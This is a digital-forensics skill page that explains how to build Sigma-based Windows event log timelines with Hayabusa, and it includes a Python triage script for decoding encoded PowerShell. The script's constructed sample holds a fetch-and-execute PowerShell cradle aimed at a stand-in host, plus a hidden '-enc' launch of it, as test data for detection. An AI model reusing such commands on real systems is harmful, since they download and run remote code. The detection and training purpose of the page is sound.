generating-forensic-timelines-with-hayabusa
Produce Sigma-based EVTX timelines and summaries with Hayabusa.
| Field | Value |
|---|---|
| name | generating-forensic-timelines-with-hayabusa |
| description | Produce Sigma-based EVTX timelines and summaries with Hayabusa. |
| domain | cybersecurity |
| subdomain | digital-forensics |
| tags | ["hayabusa","dfir","evtx","sigma","timeline","threat-hunting","windows-event-logs","forensics"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | ["RS.AN-03"] |
| mitre_attack | ["T1059.001"] |
Hayabusa (隼, Japanese for "peregrine falcon") is a Sigma-based threat-hunting and fast-forensics timeline generator for Windows event logs, developed by Yamato Security in Rust. It parses .evtx files (offline or via live analysis of a local host), applies a large built-in library of Sigma detection rules plus Hayabusa-specific rules, and produces a single, readable, chronological timeline of high-signal events with severity levels, MITRE ATT&CK tactics, and rule references. This collapses thousands of raw event-log records into a prioritized incident timeline that an analyst can review quickly.
Hayabusa is purpose-built for DFIR triage. Instead of loading EVTX into a SIEM, an investigator runs a single binary against a directory of collected logs and gets a CSV or JSON timeline plus metrics (events per computer, per Event ID, per channel). Because detections are Sigma-based, coverage tracks the open detection-engineering community, and rules can be updated on demand with update-rules. The tool's output integrates with downstream analysis: CSV opens in Timeline Explorer, JSONL feeds into jq, and timesketch-* profiles export directly into Timesketch.
A frequent finding in Hayabusa timelines is malicious PowerShell, MITRE ATT&CK T1059.001 (Command and Scripting Interpreter: PowerShell), surfaced via Sigma rules over Event ID 4104 (script-block logging), Event ID 4103 (module logging), and Sysmon Event ID 1 process creation. This skill maps to NIST CSF RS.AN-03 (analysis is performed to establish what has taken place during an incident).
Hayabusa turns a directory of collected .evtx files into a prioritized timeline. Install a release binary:

```bash
# Linux example
curl -LO https://github.com/Yamato-Security/hayabusa/releases/latest/download/hayabusa-3.0.0-lin-x64-gnu.zip
unzip hayabusa-*.zip && cd hayabusa-*
./hayabusa-3.0.0-lin-x64-gnu --version
```

Or build from source (rules are a submodule):

```bash
git clone https://github.com/Yamato-Security/hayabusa.git --recursive
cd hayabusa && cargo build --release
```

Prerequisites:
- Collected .evtx files (or run with --live-analysis on the host, as Administrator).
- Current rules: `./hayabusa update-rules`
- Optional: jq for JSONL output.

| Technique ID | Official Name | Why Hayabusa Detects It |
|---|---|---|
| T1059.001 | Command and Scripting Interpreter: PowerShell | Sigma rules over Event IDs 4104/4103 and Sysmon flag malicious PowerShell |
| T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Rules over process-creation events surface suspicious cmd usage |
| T1078 | Valid Accounts | Logon events (4624/4625/4672) reveal anomalous authentication |
| T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Rules over registry-modification events flag persistence |
| T1053.005 | Scheduled Task/Job: Scheduled Task | Event ID 4698/106 rules surface task creation |
| T1003 | OS Credential Dumping | Rules flag LSASS access and credential-dumping patterns |
Pull the latest Sigma and Hayabusa rules before every investigation.
```bash
./hayabusa update-rules
```
Point Hayabusa at a directory of .evtx files and write a CSV timeline. -w skips the interactive wizard for scripted runs.
```bash
./hayabusa csv-timeline -d ./collected_evtx -o timeline.csv -w
# UTC timestamps for cross-host correlation
./hayabusa csv-timeline -d ./collected_evtx -o timeline_utc.csv -U -w
```
Profiles control detail. Use verbose to include MITRE ATT&CK tactics, tags, and the source rule/EVTX file; all-field-info to retain every original field.
```bash
# Verbose: adds MITRE tactics, tags, rule file, evtx file
./hayabusa csv-timeline -d ./collected_evtx -o timeline_verbose.csv -p verbose -w
# Preserve all original event fields
./hayabusa csv-timeline -d ./collected_evtx -o timeline_full.csv -p all-field-info -w
```
Available profiles: minimal, standard (default), verbose, all-field-info, all-field-info-verbose, super-verbose, timesketch-minimal, timesketch-verbose.
Focus triage on the highest-confidence detections with -m/--min-level.
```bash
./hayabusa csv-timeline -d ./collected_evtx -o critical.csv -m high -w
```
Levels: informational, low, medium, high, critical.
JSONL feeds cleanly into jq and downstream pipelines.
```bash
./hayabusa json-timeline -d ./collected_evtx -L -o timeline.jsonl -w
# Example: top rule titles
jq -r '.RuleTitle' timeline.jsonl | sort | uniq -c | sort -rn | head
```
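A post-processing script for the JSONL output, added here as an example (it is not part of Hayabusa or Takajō): it loads the timeline, applies a level floor the way -m does, tallies events per computer and per level, and extracts and base64/UTF-16LE-decodes -EncodedCommand payloads, the T1059.001 pattern the search step's regex hunts for. Field names (Timestamp, Computer, Level, RuleTitle, Details) follow json-timeline's output and the abbreviated level names (info/low/med/high/crit) are assumed from Hayabusa's CSV output; the three records embedded as SAMPLE_JSONL are constructed, not case data. Unlike the search regex on this page, ENCODED_RE also accepts the short -e, -ec and -en prefixes that powershell.exe allows.

```python
"""Post-process a Hayabusa JSONL timeline: level floor, summaries, and
decoding of -EncodedCommand payloads (T1059.001). Example code added to this
page; not part of Hayabusa."""
import base64
import json
import re
import sys
from collections import Counter

# Assumption: Hayabusa emits abbreviated levels (info/low/med/high/crit);
# the long names accepted by -m/--min-level are mapped to the same ranks.
LEVEL_RANK = {"info": 0, "informational": 0, "low": 1, "med": 2, "medium": 2,
              "high": 3, "crit": 4, "critical": 4}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match "-e", "-ec" or "-en<letters>" followed by base64.
ENCODED_RE = re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)

# Constructed sample: three records in the shape json-timeline -L emits.
_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_ENCODED_PS = base64.b64encode(_PLAINTEXT.encode("utf-16-le")).decode("ascii")
SAMPLE_JSONL = "\n".join(json.dumps(r) for r in [
    {"Timestamp": "2024-05-01 09:00:01.000 +00:00", "Computer": "WS01.corp.local",
     "Channel": "Sysmon", "EventID": 1, "Level": "high",
     "RuleTitle": "Suspicious Encoded PowerShell Command Line",
     "Details": {"Cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED_PS}",
                 "User": "CORP\\alice"}},
    {"Timestamp": "2024-05-01 09:00:05.000 +00:00", "Computer": "WS01.corp.local",
     "Channel": "PwSh", "EventID": 4104, "Level": "med",
     "RuleTitle": "PowerShell Download Pattern",
     "Details": {"ScriptBlock": _PLAINTEXT}},
    {"Timestamp": "2024-05-01 09:02:00.000 +00:00", "Computer": "DC01.corp.local",
     "Channel": "Sec", "EventID": 4624, "Level": "info",
     "RuleTitle": "Logon (Network)", "Details": "TgtUser: alice ¦ SrcIP: 10.0.0.5"},
])


def load_timeline(text):
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def filter_min_level(events, min_level):
    """Keep events at or above min_level, like -m/--min-level."""
    floor = LEVEL_RANK[min_level.lower()]
    return [e for e in events
            if LEVEL_RANK.get(str(e.get("Level", "")).lower(), 0) >= floor]


def details_text(details):
    """Details is an object in JSON output but a plain string in some profiles."""
    if isinstance(details, dict):
        return " ".join(str(v) for v in details.values())
    return str(details or "")


def summarize(events):
    """Per-computer and per-level counts plus the ten most frequent rule titles."""
    return {
        "by_computer": Counter(e.get("Computer") for e in events),
        "by_level": Counter(str(e.get("Level", "")).lower() for e in events),
        "top_rules": Counter(e.get("RuleTitle") for e in events).most_common(10),
    }


def decode_encoded_command(b64):
    """-EncodedCommand is base64 of UTF-16LE; return None if either layer is invalid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def find_encoded_powershell(events):
    """Scan Details of every event for encoded commands and decode them."""
    hits = []
    for e in events:
        for m in ENCODED_RE.finditer(details_text(e.get("Details"))):
            decoded = decode_encoded_command(m.group(1))
            if decoded is not None:
                hits.append({"Timestamp": e.get("Timestamp"), "Computer": e.get("Computer"),
                             "RuleTitle": e.get("RuleTitle"), "Decoded": decoded})
    return hits


def main(argv):
    # Usage: python triage_jsonl.py timeline.jsonl  (no argument: the constructed sample)
    text = open(argv[1], encoding="utf-8").read() if len(argv) > 1 else SAMPLE_JSONL
    events = load_timeline(text)
    s = summarize(events)
    print("events per computer:", dict(s["by_computer"]))
    print("events per level:", dict(s["by_level"]))
    for title, n in s["top_rules"]:
        print(f"{n:5d}  {title}")
    for h in find_encoded_powershell(filter_min_level(events, "medium")):
        print(f"[{h['Timestamp']}] {h['Computer']} ({h['RuleTitle']}): {h['Decoded']}")


if __name__ == "__main__":
    main(sys.argv)
```

Decoding is done strictly (validated base64, strict UTF-16LE) so that a truncated or non-PowerShell base64 blob in a command line yields None instead of garbage; a hit that decodes is worth a pivot on the Computer and Timestamp back into the full timeline.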
Summaries reveal which hosts and Event IDs dominate, and pivot keywords give hunting leads.
```bash
./hayabusa computer-metrics -d ./collected_evtx -o computers.csv
./hayabusa eid-metrics -d ./collected_evtx -o eid.csv
./hayabusa log-metrics -d ./collected_evtx -o logs.csv
./hayabusa pivot-keywords-list -d ./collected_evtx -m medium -o pivots
```
Use the search command for keyword or regex hunting independent of detection rules.
```bash
# Keyword search (case-insensitive) for a suspicious binary
./hayabusa search -d ./collected_evtx -k "powershell" -i
# Regex search for base64-looking PowerShell encoded commands
./hayabusa search -d ./collected_evtx -r "-[Ee]nc(odedCommand)?\s+[A-Za-z0-9+/=]{20,}"
```
On the affected machine (Administrator), analyze local logs without exporting first.
```bash
./hayabusa csv-timeline -l -o live_timeline.csv -m high -w
```
| Tool | Purpose | Source |
|---|---|---|
| Hayabusa | Sigma-based EVTX timeline/threat hunting | https://github.com/Yamato-Security/hayabusa |
| hayabusa-rules | Sigma + Hayabusa detection rules | https://github.com/Yamato-Security/hayabusa-rules |
| Takajō | Hayabusa results analyzer | https://github.com/Yamato-Security/takajo |
| Timeline Explorer | Review CSV timelines | https://ericzimmerman.github.io/ |
| Timesketch | Collaborative timeline analysis | https://timesketch.org/ |
| Sigma | Generic detection rule format | https://github.com/SigmaHQ/sigma |
Checklist:
- Binary installed and --version confirmed.
- update-rules run before analysis.
- Input: the collected .evtx directory.